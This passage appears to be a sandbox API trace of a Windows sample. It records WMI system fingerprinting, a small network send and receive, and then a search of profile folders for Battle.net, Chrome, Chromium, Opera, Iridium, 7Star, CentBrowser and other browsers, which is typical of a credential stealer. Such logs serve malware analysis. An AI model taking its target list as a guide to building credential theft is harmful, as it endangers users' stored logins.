pVal=0x19f214*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f294*=0, plFlavor=0x19f290*=0 | out: pVal=0x19f214*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f294*=3, plFlavor=0x19f290*=64) returned 0x0 [0279.647] IWbemClassObject:Get (in: This=0x553aac8, wszName="__PATH", lFlags=0, pVal=0x19f1f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f27c*=0, plFlavor=0x19f278*=0 | out: pVal=0x19f1f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"", varVal2=0x0), pType=0x19f27c*=8, plFlavor=0x19f278*=64) returned 0x0 [0279.647] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x72 [0279.647] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x72 [0279.647] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f224 | out: ppv=0x19f224*=0x601a94) returned 0x0 [0279.647] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f21c | out: pAptType=0x19f21c*=1) returned 0x0 [0279.647] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f220 | out: ppvObject=0x19f220*=0x0) returned 0x80004002 [0279.647] IUnknown:Release (This=0x601a94) returned 0x1 [0279.648] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb90 | out: ppv=0x19eb90*=0x54ba418) returned 0x0 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba418, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eda8 | out: ppvObject=0x19eda8*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba418, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edbc | out: ppvObject=0x19edbc*=0x5542b30) returned 0x0 [0279.649] WbemDefPath:IUnknown:Release (This=0x54ba418) returned 0x0 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9dc | out: ppvObject=0x19e9dc*=0x5542b30) returned 0x0 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e998 | out: ppvObject=0x19e998*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e58c | out: ppvObject=0x19e58c*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IUnknown:AddRef (This=0x5542b30) returned 0x3 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2f4 | out: ppvObject=0x19e2f4*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2a4 | out: ppvObject=0x19e2a4*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2b0 | out: ppvObject=0x19e2b0*=0x5543568) returned 0x0 [0279.649] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5543568, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e2b8 | out: pCid=0x19e2b8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.649] WbemDefPath:IUnknown:Release (This=0x5543568) returned 0x3 [0279.649] CoGetContextToken (in: pToken=0x19e310 | out: pToken=0x19e310) returned 0x0 [0279.649] CoGetContextToken (in: pToken=0x19e718 | out: pToken=0x19e718) returned 0x0 [0279.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7a8 | out: ppvObject=0x19e7a8*=0x0) returned 0x80004002 [0279.649] WbemDefPath:IUnknown:Release (This=0x5542b30) returned 0x2 [0279.649] WbemDefPath:IUnknown:Release (This=0x5542b30) returned 0x1 [0279.649] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0279.649] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0279.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542b30, riid=0x19f0d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f0cc | out: ppvObject=0x19f0cc*=0x5542b30) returned 0x0 [0279.650] WbemDefPath:IUnknown:AddRef (This=0x5542b30) returned 0x3 [0279.650] WbemDefPath:IUnknown:Release (This=0x5542b30) returned 0x2 [0279.650] WbemDefPath:IWbemPath:SetText (This=0x5542b30, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f250 | out: puCount=0x19f250*=0x2) returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f24c*=0x0, pszText=0x0 | out: puBuffLength=0x19f24c*=0xf, pszText=0x0) returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f24c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f24c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f21c | out: puCount=0x19f21c*=0x2) returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f218*=0x0, pszText=0x0 | out: puBuffLength=0x19f218*=0xf, pszText=0x0) returned 0x0 [0279.650] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f218*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f218*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.650] IWbemClassObject:Get (in: This=0x553aac8, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x19f218*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226df04*=0, plFlavor=0x226df08*=0 | out: pVal=0x19f218*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096620", varVal2=0x0), pType=0x226df04*=21, plFlavor=0x226df08*=0) returned 0x0 [0279.650] SysStringByteLen (bstr="2096620") returned 0xe [0279.650] SysStringByteLen (bstr="2096620") returned 0xe [0279.651] IWbemClassObject:Get (in: This=0x553aac8, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x19f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226df04*=21, plFlavor=0x226df08*=0 | out: pVal=0x19f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096620", varVal2=0x0), pType=0x226df04*=21, plFlavor=0x226df08*=0) returned 0x0 [0279.651] SysStringByteLen (bstr="2096620") returned 0xe [0279.651] SysStringByteLen (bstr="2096620") returned 0xe [0279.653] CoTaskMemAlloc (cb=0x4) returned 0x54ba3e8 [0279.653] IEnumWbemClassObject:Next (in: This=0x663910, lTimeout=-1, uCount=0x1, apObjects=0x54ba3e8, puReturned=0x226d678 | out: apObjects=0x54ba3e8*=0x0, puReturned=0x226d678*=0x0) returned 0x1 [0279.655] CoTaskMemFree (pv=0x54ba3e8) [0279.655] CoGetContextToken (in: pToken=0x19f150 | out: pToken=0x19f150) returned 0x0 [0279.655] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0279.655] IUnknown:Release (This=0x663910) returned 0x0 [0279.656] CoGetContextToken (in: pToken=0x19f150 | out: pToken=0x19f150) returned 0x0 [0279.656] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0279.656] IUnknown:Release (This=0x663780) returned 0x0 [0279.662] CoCreateGuid (in: pguid=0x19ef80 | out: pguid=0x19ef80*(Data1=0x9dab8859, Data2=0xc2e5, Data3=0x4231, Data4=([0]=0xa7, [1]=0x52, [2]=0x47, [3]=0x4d, [4]=0x11, [5]=0x9b, [6]=0xe, [7]=0x3e))) returned 0x0 [0279.662] CoCreateGuid (in: pguid=0x19eeb0 | out: pguid=0x19eeb0*(Data1=0x6288d3d9, Data2=0x80e9, Data3=0x4461, Data4=([0]=0xb0, [1]=0xb9, [2]=0x86, [3]=0x3d, [4]=0x75, [5]=0x70, [6]=0x4a, [7]=0x1a))) returned 0x0 [0279.694] send (s=0x348, buf=0x211a2ef*, len=292, flags=0) returned 292 [0279.696] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 132 [0279.844] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.844] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net") returned 0x2f [0279.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2e [0279.845] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\", lpFilePart=0x0) returned 0x2f [0279.845] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\battle.net\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.849] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.849] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned 0x37 [0279.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.850] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x36 [0279.850] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\", lpFilePart=0x0) returned 0x37 [0279.850] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.857] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.857] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3c [0279.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x3b [0279.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x3c [0279.858] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.861] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.861] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x41 [0279.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.861] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x40 [0279.861] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x41 [0279.862] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google(x86)\\chrome\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.864] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.864] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\") returned 0x36 [0279.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x35 [0279.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x35 [0279.865] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.867] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.867] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x45 [0279.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x44 [0279.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\", lpFilePart=0x0) returned 0x45 [0279.868] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maplestudio\\chromeplus\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.870] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.870] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data") returned 0x36 [0279.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x35 [0279.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\", lpFilePart=0x0) returned 0x36 [0279.870] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iridium\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.873] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.873] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x3a [0279.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.873] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x39 [0279.873] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\", lpFilePart=0x0) returned 0x3a [0279.874] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\7star\\7star\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.876] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.876] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned 0x3a [0279.876] 